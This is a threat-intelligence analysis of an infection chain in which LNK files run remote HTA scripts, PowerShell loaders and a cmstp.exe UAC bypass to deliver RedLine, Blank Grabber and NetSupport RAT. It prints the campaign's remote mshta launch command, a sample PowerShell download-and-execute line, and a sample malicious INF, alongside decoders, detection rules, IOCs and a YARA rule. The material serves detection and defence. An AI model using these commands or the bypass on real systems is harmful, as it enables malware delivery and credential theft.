Key Takeaways
- The blog highlights an infection chain that leverages the Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass.
- Similar VBScript and PowerShell scripts were used in past campaigns to deliver Invicta Stealer without leveraging CMSTP, indicating that attackers might have updated TTPs.
- The infection chain begins with a .zip or .iso file whose first stage is a ‘.lnk’ file, and progresses through multiple stages that end in distinct malware payloads.
- The scripts used in the intermediate stages are decoded and executed on the fly rather than written to disk in clear form, which hinders detection.
Executive Summary
In early 2022, Microsoft announced that macros would be blocked by default in Office documents downloaded from the Internet. In response, threat actors (TAs) shifted away from malicious macros for initial access and began favoring other executable attachments, with malicious LNK files becoming a preferred vector for downloading and executing payloads. During this timeframe, Cyble Research and Intelligence Labs (CRIL) also discovered an LNK builder named “Quantum Lnk Builder” being offered on cybercrime forums.
We also observed a campaign whose infection sequence uses Microsoft’s cmstp.exe for proxy execution. In this campaign we identified multiple malware families, all launched through cmstp.exe. Recently, CRIL uncovered the infection method of Invicta Stealer and found that it employs a similar script for fetching malware payloads; however, the Invicta Stealer chain does not involve cmstp.exe, which suggests the TAs might have evolved their TTPs.
We suspect that TAs are distributing the malicious attachments through spam emails. The infection chain commences with a malicious .zip or .iso file containing an LNK file that triggers a remote VBScript.
The VBScript de-obfuscates and launches a PowerShell loader, which in turn decrypts and runs a PowerShell downloader. This downloader retrieves the malware payload and, in some cases, a decoy document; it also drops a malicious .inf file. When that .inf file is executed through cmstp.exe, it becomes the conduit for launching the malware payload. The figure below shows the infection chain.

Initial Infection
The initial infection commences with a .zip or .iso file containing a malicious .lnk file, often disguised as a PDF. The LNK file runs a command that leads to the remote execution of an .hta file. For example, in one case the LNK file executes the following command:
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S2\mh?a.* 'http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta'
The path to mshta.exe is written with wildcards (‘mh?a.*’) that PowerShell resolves at run time, so the literal string “mshta” never appears in the LNK. The command references a malicious .hta file hosted on a remote server. The figure below shows the .lnk file.

This command launches mshta.exe to execute the remote file at http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta. The file uses multiple layers of obfuscation to hide the malicious VBScript.
The figure below shows the process tree.

Technical Analysis
The .hta file executed by the .lnk file consists of VBScript. In this campaign, we primarily observed two distinct obfuscation techniques employed on VBScript. Regardless of the obfuscation method applied, all the VBScripts delivered a similar PowerShell loader.
First Obfuscation Technique
In this approach, the TA hides strings as arrays of integers: every character is stored as its ASCII code plus a constant, and the script recovers each character by subtracting that constant. For this obfuscation layer the constant is 44536.
The figure below shows the decoding routine in the .hta file.

The TA has hardcoded integer values into two arrays, which are subsequently converted into their corresponding ASCII characters. The first array decodes to a PowerShell command, and the second to ‘Wscript.Shell’. The script uses the WScript.Shell Run method to execute the PowerShell command. The figure below displays the decoded content of the .hta file.

To recover the next-stage PowerShell loader, we created a simple Python script that holds the integer array and the constant and performs the subtraction.
The figure below shows the Python script.

Second Obfuscation Technique
This technique also derives ASCII values from arithmetic, but here each character is the difference between a decimal literal and a hexadecimal literal prefixed with “&H” (VBScript’s hexadecimal notation, which the interpreter converts to its decimal equivalent). After de-obfuscation, the resulting string is run with the Execute function.
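The following Python script is an added example written for this page; it is not the decoding script from the post and not the TA’s HTA. It implements both decoding routines described above (the offset-array layer with the 44536 constant, and the Chr(<decimal> - &H<hex>) layer), adds a brute-force recovery of the constant for samples that change it, and builds its own constructed VBScript fragments as input. The command text inside those fragments is an assumption.

```python
"""Decoders for the two VBScript obfuscation layers described above.

Added example (editor's code, not the post's decoding script and not the
TA's HTA). Both sample fragments are constructed: technique 1 stores each
character as its ASCII code plus 44536 (the constant the post names) inside
a VBScript Array(); technique 2 writes each character as Chr(<decimal> - &H<hex>)
joined with '&' and handed to Execute(). The command text is ours.
"""
from __future__ import annotations

import re

CONSTANT = 44536  # offset used by the first layer in the analysed sample


# --- constructed sample input --------------------------------------------
def encode_offset_array(text: str, constant: int) -> str:
    """Obfuscate like technique 1 (used here only to build the sample)."""
    return ", ".join(str(ord(c) + constant) for c in text)


def encode_chr_expressions(text: str) -> str:
    """Obfuscate like technique 2 (used here only to build the sample)."""
    parts = []
    for i, c in enumerate(text):
        hex_off = 0xA0 + (i % 16)  # a varying &H operand, as a real script might use
        parts.append(f"Chr({ord(c) + hex_off}-&H{hex_off:X})")
    return "Execute(" + " & ".join(parts) + ")"


SAMPLE_CMD = 'powershell -w hidden -nop -c "iex((New-Object Net.WebClient).DownloadString($u))"'
SAMPLE_HTA_1 = (
    f"cmd = Array({encode_offset_array(SAMPLE_CMD, CONSTANT)})\n"
    f"shl = Array({encode_offset_array('Wscript.Shell', CONSTANT)})\n"
)
SAMPLE_HTA_2 = encode_chr_expressions(SAMPLE_CMD)

# --- decoders --------------------------------------------------------------
_ARRAY_RE = re.compile(r"Array\(\s*([\d\s,]+?)\s*\)", re.IGNORECASE)
_CHR_RE = re.compile(r"Chr\(\s*(\d+)\s*-\s*&H([0-9A-F]+)\s*\)", re.IGNORECASE)
KEYWORDS = ("powershell", "wscript", "shell", "cmd")


def find_int_arrays(vbs: str) -> list[list[int]]:
    """Return every integer Array(...) literal in the script, in source order."""
    return [[int(n) for n in m.group(1).split(",") if n.strip()]
            for m in _ARRAY_RE.finditer(vbs)]


def decode_offset_array(values: list[int], constant: int) -> str:
    """Technique 1: subtract the constant from every element and map to characters."""
    return "".join(chr(v - constant) for v in values)


def recover_constant(values: list[int]) -> int | None:
    """Brute-force the constant for a sample that changes it.

    Every decoded character must be printable ASCII (32..126), which pins the
    constant to a window of at most 95 candidates; the first candidate whose
    output contains a known keyword is returned, None if none does.
    """
    lo, hi = max(values) - 126, min(values) - 32
    for candidate in range(lo, hi + 1):
        text = decode_offset_array(values, candidate).lower()
        if any(k in text for k in KEYWORDS):
            return candidate
    return None


def decode_chr_expressions(vbs: str) -> str:
    """Technique 2: evaluate each Chr(<dec> - &H<hex>) and concatenate the results."""
    return "".join(chr(int(dec) - int(hx, 16)) for dec, hx in _CHR_RE.findall(vbs))


if __name__ == "__main__":
    for values in find_int_arrays(SAMPLE_HTA_1):
        k = recover_constant(values)
        print("no constant found" if k is None else f"constant={k}: {decode_offset_array(values, k)}")
    print(decode_chr_expressions(SAMPLE_HTA_2))
```

Point the decoders at a real HTA by reading the file and passing its text to find_int_arrays or decode_chr_expressions; recover_constant is the step to reach for when a new sample no longer uses 44536.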

PowerShell Loader
The PowerShell script shown in the figure below holds AES-encrypted data in a variable. The script decrypts this data and then decompresses the result; the output is the next-stage PowerShell downloader, which is piped to a second PowerShell process for execution.

We authored a Python script to recover the content of the next-stage downloader. The figure below shows the Python script.

PowerShell Downloader
The PowerShell downloader is split into segments that use different encoding techniques. It also contains several arrays that are de-obfuscated using the same approach illustrated in Figure 4.
For example, in one of the cases, these arrays translated into the subsequent strings:
- Hidden
- WebClient/
- hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
- hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
The figure below shows the final PowerShell Downloader.

This script downloads files from the following URLs and saves them to the “AppData\Roaming” directory while preserving their original names.
- hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
- hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
The figure below shows the network activity.

It downloads a clean PDF and a RedLine Stealer binary, and opens the PDF as a decoy to mask the malicious activity. The figure below shows the PDF file.

Leveraging CMSTP
The PowerShell downloader leverages cmstp.exe for proxy execution and UAC bypass. It uses a Set-INFFile function to create an INF (Information) file, taking the location of the INF file ($InfFileLocation) and a command to execute ($CommandToExecute) as parameters; the function and parameter names match the publicly available PowerShell CMSTP UAC-bypass proof of concept.
It drops a malicious .inf file named “CMSTP.inf” into the %temp% directory and executes it by starting cmstp.exe (Connection Manager Profile Installer) with the arguments “/au” and “$InfFileLocation”, as shown in the figure below.

The script relies on cmstp.exe being an auto-elevated Microsoft binary: under the default UAC setting, and for a user who is a member of the local Administrators group, it starts at high integrity without a consent prompt. The RunPreSetupCommandsSection of the INF lists the path to the malware payload, and cmstp.exe runs that section before it installs the profile, so the payload inherits the elevated token. For a standard (non-admin) user there is nothing to elevate, and the technique degrades to plain proxy execution. After the payload is launched, cmstp.exe installs a fabricated Connection Manager service profile labeled ‘Notepad’.
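The following Python triage script is an added example written for this page; it is not the campaign’s Set-INFFile output and not tooling from the post. It parses an INF the way an analyst would before deciding what cmstp.exe would have run: it follows the install section’s command keys to the listed commands, pulls the decoy profile name from the Strings section, and flags commands that live in user-writable directories. SAMPLE_INF is constructed to follow the layout described above (RunPreSetupCommands pointing at a section that holds the payload path, a profile named ‘Notepad’); the full payload path and the victim user name are assumptions.

```python
"""Triage parser for INF files handed to cmstp.exe /au.

Added example (editor's code, not the campaign's Set-INFFile output and not
tooling from the post). SAMPLE_INF is constructed to follow the layout the
post describes: an install section whose RunPreSetupCommands key points at a
section listing the payload to run, and a Strings section naming the decoy
profile 'Notepad'. The payload path and the victim user name are assumptions.
"""
from __future__ import annotations

import re
import sys

SAMPLE_INF = r"""
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; cmstp.exe runs each line here before the profile install starts
C:\Users\victim\AppData\Roaming\71iqujprzsp4w.exe

[Strings]
ServiceName="Notepad"
ShortSvcName="Notepad"
"""

# INF keys whose value names a section that cmstp.exe executes (commands) or
# loads (OCX/DLL) while installing or removing a Connection Manager profile.
EXEC_KEYS = {"runpresetupcommands", "runpostsetupcommands", "registerocxs", "unregisterocxs"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)


def parse_inf(text: str) -> dict[str, list[tuple[str | None, str]]]:
    """Minimal INF/INI parser: {section: [(key, value), ...]}; ';' comments dropped.

    Lines without '=' (the command lines of a RunPreSetupCommands section) are
    stored with key None.
    """
    sections: dict[str, list[tuple[str | None, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, [])
        elif current is not None:
            key, sep, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()) if sep else (None, line))
    return sections


def _section(sections: dict, name: str) -> list:
    """Case-insensitive section lookup (INF section names are not case-sensitive)."""
    for sec, entries in sections.items():
        if sec.lower() == name.lower():
            return entries
    return []


def find_commands(sections: dict) -> list[tuple[str, str]]:
    """Follow every *Install section's exec keys to the lines cmstp.exe would run."""
    commands = []
    for sec, entries in sections.items():
        if "install" not in sec.lower():
            continue
        for key, target in entries:
            if key is None or key.lower() not in EXEC_KEYS:
                continue
            for k, v in _section(sections, target):
                # a command line may itself contain '=', so rejoin what the parser split
                commands.append((key, v if k is None else f"{k}={v}"))
    return commands


def triage(inf_text: str) -> dict:
    """Summarise what an INF would make cmstp.exe do."""
    sections = parse_inf(inf_text)
    commands = find_commands(sections)
    names = {k.lower(): v.strip('"') for k, v in _section(sections, "Strings") if k}
    return {
        "profile_name": names.get("servicename"),
        "commands": commands,
        "from_user_writable": [c for _, c in commands if USER_WRITABLE.search(c)],
    }


if __name__ == "__main__":
    text = SAMPLE_INF
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    for field, value in triage(text).items():
        print(f"{field}: {value}")
```

A legitimate Connection Manager profile rarely carries any RunPreSetupCommands at all, so a non-empty commands list from an INF found under %temp% is itself the finding; the from_user_writable list only narrows it to the payload.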
The figure below shows the malicious “.inf” file.

Malware Payloads
Blank Grabber
Blank Grabber is an open-source stealer coded in Python. This stealer is equipped with a GUI builder, which can be used to conveniently generate a stealer payload. The builder provides the option to customize stealer payloads such as UAC bypass, custom icon, and startup execution for persistence.
It has multiple anti-VM functions. It employs obfuscated code, fake errors, and EXE binding to conceal itself while capturing browser data, Discord tokens, gaming sessions, passwords, and cookies. Additionally, it steals system info, IP details, webcam images, and crypto wallets, forwarding all data through Discord Webhooks or Telegram Bot.
The figure below depicts the Blank Grabber strings found within the binary delivered in this campaign:

Redline Stealer
RedLine Stealer is one of the most prominent InfoStealers in cyberspace. It is sold on cybercrime forums and can steal data and introduce additional malware to operating systems. Cybercriminals deploy it to gain unauthorized access to sensitive information like logins, passwords, autofill data, and credit card details from Gecko and Chromium browsers. Detailed analysis of Redline Stealer can be found here.
Apart from the domain mentioned in the initial analysis, we found the following URLs delivering the RedLine Stealer binary:
- hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe
- hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe
NetSupport RAT
NetSupport Manager, a commercially available RAT (Remote Administration Tool), is primarily intended for legitimate remote access to user computers by administrators. Regrettably, TAs also misuse this tool to gain unauthorized access to compromised systems. Security Researcher Kostas identified an instance where NetSupportRAT was executed using cmstp, and we encountered several similar cases as well. We observed the following URL spreading NetSupportRAT:
- hxxps[:]//montec-shop[.]de/images/client32[.]exe
Conclusion
The adoption of the Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass illustrates the attackers’ adaptability: a signed, auto-elevating system binary carries the final payload instead of a conspicuous dropper. The heavy use of obfuscation together with a multi-stage chain shows a sustained effort to evade detection.
We have previously encountered tools such as the Quantum Lnk Builder for sale on cybercrime forums. These tools generate malicious LNK files, and their availability lowers the effort for TAs to experiment with techniques and deploy different kinds of attacks.
Our Recommendations
• In this campaign, malicious INF files are executed via CMSTP.exe. We recommend that organizations block or alert on CMSTP.exe when its command line contains both the ‘/au’ flag and the string ‘\AppData\Local\Temp’. Because the drop directory is trivial for an attacker to change, also alert on cmstp.exe whose parent is a scripting host (powershell.exe, wscript.exe, mshta.exe, cmd.exe), as seen in this campaign’s process tree, and on any ‘/au’ install of an INF that does not reside under Program Files or Windows.
• The initial infection occurs via spam email. Therefore, it is advisable to deploy effective email filtering solutions to identify and prevent the delivery of malicious attachments.
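The following Python detection is an added example written for this page; it is not a rule from the post or from any vendor product. It runs the recommendation above over constructed process-creation records in Sysmon Event ID 1 style and adds two wider checks (INF outside admin-only directories, cmstp.exe parented by a scripting host) so the reader can see what the Temp-only string match catches and what it misses. The file paths, user name and parent processes in the events are assumptions.

```python
"""Detection logic for the cmstp.exe proxy-execution / UAC-bypass pattern.

Added example (editor's code, not a rule from the post or from any vendor).
EVENTS are constructed process-creation records in Sysmon Event ID 1 style;
paths, user name and parent processes are assumptions chosen to show a true
positive matching the post's chain, a benign profile install, and a variant
that the Temp-only string match in the recommendation would miss.
"""
from __future__ import annotations

import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
TRUSTED_INF_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
# '/au' (or '-au') followed by a quoted or unquoted path ending in .inf
_AU_INF = re.compile(r'[/-]au\s+"?([^"]+?\.inf)"?(?:\s|$)', re.IGNORECASE)

EVENTS = [
    {   # true positive: the downloader drops CMSTP.inf in %temp% and runs cmstp.exe /au
        "Image": r"C:\Windows\System32\cmstp.exe",
        "CommandLine": r"C:\Windows\System32\cmstp.exe /au C:\Users\victim\AppData\Local\Temp\CMSTP.inf",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # benign: a packaged VPN profile installed from Program Files by the user
        "Image": r"C:\Windows\System32\cmstp.exe",
        "CommandLine": r'cmstp.exe /au "C:\Program Files\CorpVPN\corpvpn.inf"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # variant: same technique, but the INF is written to Roaming instead of Temp
        "Image": r"C:\Windows\System32\cmstp.exe",
        "CommandLine": r'cmstp.exe /au "C:\Users\victim\AppData\Roaming\CMSTP.inf"',
        "ParentImage": r"C:\Windows\System32\wscript.exe",
    },
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def inf_path_from_cmdline(cmdline: str) -> str | None:
    """Return the INF argument of /au (quoted or not), or None if there is none."""
    m = _AU_INF.search(cmdline)
    return m.group(1) if m else None


def evaluate(event: dict) -> list[str]:
    """Return the names of the rules this event triggers (empty list = no alert)."""
    if basename(event["Image"]) != "cmstp.exe":
        return []
    inf = inf_path_from_cmdline(event["CommandLine"])
    if inf is None:
        return []  # no '/au <inf>': outside the pattern these rules cover
    hits = []
    # Rule 1: the recommendation as written: '/au' plus '\AppData\Local\Temp' on the command line
    if r"\appdata\local\temp" in event["CommandLine"].lower():
        hits.append("cmstp_au_inf_in_temp")
    # Rule 2: the profile INF does not come from a location only admins can write
    if not inf.lower().startswith(TRUSTED_INF_DIRS):
        hits.append("cmstp_au_inf_outside_trusted_dirs")
    # Rule 3: cmstp.exe launched by a scripting host, as in the observed process tree
    if basename(event["ParentImage"]) in SCRIPT_HOSTS:
        hits.append("cmstp_spawned_by_script_host")
    return hits


def run(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Evaluate every event; return (command line, triggered rules) for those that alert."""
    alerts = []
    for e in events:
        rules = evaluate(e)
        if rules:
            alerts.append((e["CommandLine"], rules))
    return alerts


if __name__ == "__main__":
    for cmdline, rules in run(EVENTS):
        print(f"ALERT {rules}: {cmdline}")
```

The third event is the reason for rules 2 and 3: moving the INF one directory over defeats the ‘\AppData\Local\Temp’ match, while the parent process and the non-trusted install path still give it away.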
MITRE ATT&CK® Techniques
Tactic | Technique ID | Technique Name
--- | --- | ---
Execution | T1204 | User Execution
Persistence | T1547 | Boot or Logon Autostart Execution
Privilege Escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control
Defense Evasion | T1027 | Obfuscated Files or Information
Defense Evasion | T1036 | Masquerading
Defense Evasion | T1218.003 | System Binary Proxy Execution: CMSTP
Credential Access | T1528 | Steal Application Access Token
Credential Access | T1555 | Credentials from Password Stores
Discovery | T1010 | Application Window Discovery
Discovery | T1083 | File and Directory Discovery
Collection | T1005 | Data from Local System
Command and Control | T1071 | Application Layer Protocol
Indicators of Compromise (IOCs)
Indicators | Indicator Type | Description |
--- | --- | --- |
110ea5727b750a69876de6613ba71c8f80ededd2e7cef2a276a855082affcd9f | SHA256 | Blank Grabber |
hxxps[:]//transfer.sh/iATCFJFn3d/Video_of%20Dollar_Recalling.exe | URL | Malicious URL |
a6c163e45059640158828422622606f0d1608bb61ed0cb3cb27a138fe1c50c6d | SHA256 | Malicious HTA File |
hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe | URL | Malicious URL |
hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe | URL | Malicious URL |
27fd34dae9c30605a0739011fce957acd40c679b1b19a079946c4a6e6a0445f9 | SHA256 | Redline Stealer |
513bc40cedbb94ee65afe77dac8464bb2693a098a15a08bb68a761acec223cdd | SHA256 | Redline Stealer |
3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115 | SHA256 | Malicious Lnk File |
bbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563 | SHA256 | Malicious Lnk File |
9905c430c3aa6e909c773af010ef8045521aba759d20a036ce065d8bf88eb9ee | SHA256 | Malicious HTA File |
49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 | SHA256 | NetSupportManager |
hxxps[:]//montec-shop[.]de/images/client32[.]exe | URL | Malicious URL |
hxxp[:]//94.156.253[.]17/Downloads/careabout[.]hta | URL | Malicious URL |
6f08017be2fb3359cc15e2325e934465a9e7257657809f712c85f51a568e9dfc | SHA256 | Malicious Lnk File |
0786f1889d5f3f73b5d25289b2d9d8f6a578758bc6987f88d8ae7c81c2baacd9 | SHA256 | Malicious Lnk File |
e9abe79fceded092601af33d75859030242fd1e9ad4978cd1ceba5d9e9d88d7e | SHA256 | Malicious Lnk File |
de3d0a11dec2e3b4afce991a690024e96dca389f8a0a3c6a65b559c9f1c12d59 | SHA256 | Malicious Lnk File |
f9446736df6a16ba5747b617d8f69a327ec150a07f7e0adb944b65e23c2fcdc9 | SHA256 | Malicious Lnk File |
8f65f6a346f568171760ce5b747bd6177a2e0111d37a3df5047905c4f1f86346 | SHA256 | Malicious Lnk File |
687baa62d88a16ae54e4ff3ad584a5c7bdf71121a0fc84d863363f064cd6053b | SHA256 | Malicious Lnk File |
1126845e909b7c776e5b48bf64db24f19b0183b7204f50aedfb8ecba52c8dcbb | SHA256 | Malicious Lnk File |
c2807549c5965cf165839b876f8dd3ea44d51478e4cdc4dcca6146b223b0066d | SHA256 | Malicious Lnk File |
cf8decdb1efe459a0e8d5817d209cfdd27731694956db3e111f1f8cb32456a7a | SHA256 | Malicious Lnk File |
837f7e7a6799e25767839e487d97a5b61d9dc43add143e4b3680d756fefc1b95 | SHA256 | Malicious Lnk File |
845087bb407b34d8003174a3b63b6c50c7ab4b13ef81636b8344740bb7a8559c | SHA256 | Malicious Lnk File |
a2dfcc3e26858a9c730b7c10b55f82ae4dcea1a35826cfbe992287df80c4929b | SHA256 | Malicious Lnk File |
84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fef | SHA256 | Malicious Lnk File |
59b392a0ff9a3ff064b5a4ab90de5b68c758429280c612fd08f9399475d3108d | SHA256 | Malicious Lnk File |
48cffc07e026c38234b77ca74d30a07a01f16da9d8ab24be73c934d6972f0ace | SHA256 | Malicious Lnk File |
cc652a2be3f935f1bf3c40f7033239e09357da22f98b6abcab17bbb34266a02a | SHA256 | Malicious Lnk File |
df86358f815e4c6760f5005a283c5e842dd7091dc328ac0f73b7667f6754c8bc | SHA256 | Malicious Lnk File |
8b6ea98bb931bf67bcea0ff67cc5d44d956a4b3fffd1817e1f3ad89696fb3798 | SHA256 | Malicious Lnk File |
f602321b7a764a0dffe32d9dfbac7c221fcf200f13d20e4fbfe978d56496a72b | SHA256 | Malicious Lnk File |
d1825f07b07560f8d76c8d9125fc3029a4b328ecca836d01b5934ff8f02a32e1 | SHA256 | Malicious Lnk File |
a08c36812818618f44782c3677c8b8b8159a1beacbad66adbe232e694d91176e | SHA256 | Malicious Lnk File |
e9cbfe72cf4bf807f57df16611bea622c77ad501ee85c39ed171b8cdb05ba092 | SHA256 | Malicious Lnk File |
3a00180db6da59cc44933db6faa043b1ae770098a4eb52d5c2f4cf060cb60d72 | SHA256 | Malicious Lnk File |
7fd01399dec681c37cd14edeb37c601a85e1a3e567d0ff2accca1dad4bc9c53b | SHA256 | Malicious Lnk File |
YARA Rule
rule Malicious_LNK_Wildcard_mshta
{
    meta:
        description = "LNK files that reach mshta through a wildcard path and reference a .vbs/.hta or PowerShell"
    strings:
        $magic = {4C 00 00 00 01 14 02 00}
        $a1 = "m*h?a" ascii wide nocase
        $a2 = "m*h*a*" ascii wide nocase
        $a3 = ".vbs" ascii wide nocase
        $a4 = "powershell" ascii wide nocase
        $a5 = ".hta" wide nocase
    condition:
        $magic at 0 and ($a1 or $a2) and ($a3 or $a4 or $a5)
}